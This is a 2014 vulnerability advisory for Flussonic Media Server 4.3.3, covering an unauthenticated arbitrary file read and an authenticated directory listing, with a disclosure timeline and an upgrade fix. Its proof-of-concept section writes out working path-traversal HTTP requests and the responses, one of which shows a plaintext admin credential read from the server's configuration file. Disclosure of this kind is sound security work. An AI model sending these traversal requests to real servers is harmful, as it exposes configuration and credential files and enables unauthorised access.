133 lines
No EOL
4.5 KiB
Text
133 lines
No EOL
4.5 KiB
Text
Document Title:
|
||
============
|
||
Flussonic Media Server 4.3.3 Multiple Vulnerabilities
|
||
|
||
Release Date:
|
||
===========
|
||
June 29, 2014
|
||
|
||
Product & Service Introduction:
|
||
========================
|
||
Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).
|
||
|
||
Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.
|
||
|
||
Abstract Advisory Information:
|
||
=======================
|
||
BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3
|
||
|
||
Vulnerability Disclosure Timeline:
|
||
=========================
|
||
June 26, 2014 : Contact with Vendor
|
||
June 26, 2014 : Vendor Response
|
||
June 26, 2014 : Version 4.3.4 Deployed
|
||
June 29, 2014 : Public Disclosure
|
||
|
||
Discovery Status:
|
||
=============
|
||
Published
|
||
|
||
Affected Product(s):
|
||
===============
|
||
Erlyvideo, LLC
|
||
Product: Flussonic Media Server 4.1.25 - 4.3.3
|
||
|
||
Exploitation Technique:
|
||
==================
|
||
AFR: Remote, Unauthenticated
|
||
ADL: Remote, Authenticated
|
||
|
||
Severity Level:
|
||
===========
|
||
High
|
||
|
||
Technical Details & Description:
|
||
========================
|
||
1. Arbitrary File Read (Unauthenticated)
|
||
It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.
|
||
|
||
2. Arbitrary Directory Listing (Authenticated)
|
||
It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.
|
||
|
||
|
||
Proof of Concept (PoC):
|
||
==================
|
||
Proof of Concept AFR Request & Response:
|
||
|
||
GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
|
||
Host: 6.6.6.100:8080
|
||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Connection: keep-alive
|
||
|
||
HTTP/1.1 200 OK
|
||
Connection: keep-alive
|
||
Server: Cowboy
|
||
Date: Thu, 26 Jun 2014 09:50:57 GMT
|
||
Content-Length: 191
|
||
Content-Type: text/plain
|
||
Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
|
||
Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687
|
||
|
||
# Default ports Flussonic M1 Media server listens on
|
||
http 80;
|
||
http 8080;
|
||
rtmp 1935;
|
||
rtsp 554;
|
||
pulsedb /var/run/flussonic;
|
||
edit_auth flussonic letmein!;
|
||
|
||
live mylive;
|
||
|
||
file vod {
|
||
path priv;
|
||
}
|
||
|
||
2. Proof of Concept ADR Request & Response:
|
||
|
||
GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
|
||
Host: 6.6.6.100:8080
|
||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
|
||
Connection: keep-alive
|
||
|
||
HTTP/1.1 200 OK
|
||
Connection: keep-alive
|
||
Server: Cowboy
|
||
Date: Thu, 26 Jun 2014 11:04:12 GMT
|
||
Content-Length: 7555
|
||
X-Route-Time: 28
|
||
X-Run-Time: 8090
|
||
Content-Type: application/json
|
||
|
||
{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
|
||
………
|
||
{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}
|
||
|
||
|
||
Solution Fix & Patch:
|
||
================
|
||
Update version 4.3.4
|
||
|
||
Security Risk:
|
||
==========
|
||
The risk of the vulnerabilities above estimated as high and medium.
|
||
|
||
Credits & Authors:
|
||
==============
|
||
Bilgi Güvenliði Akademisi
|
||
|
||
Disclaimer & Information:
|
||
===================
|
||
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
|
||
|
||
Domain: http://bga.com.tr/advisories.html
|
||
Social: http://twitter.com/bgasecurity
|
||
Contact: bilgi@bga.com.tr
|
||
|
||
Copyright © 2014 | BGA |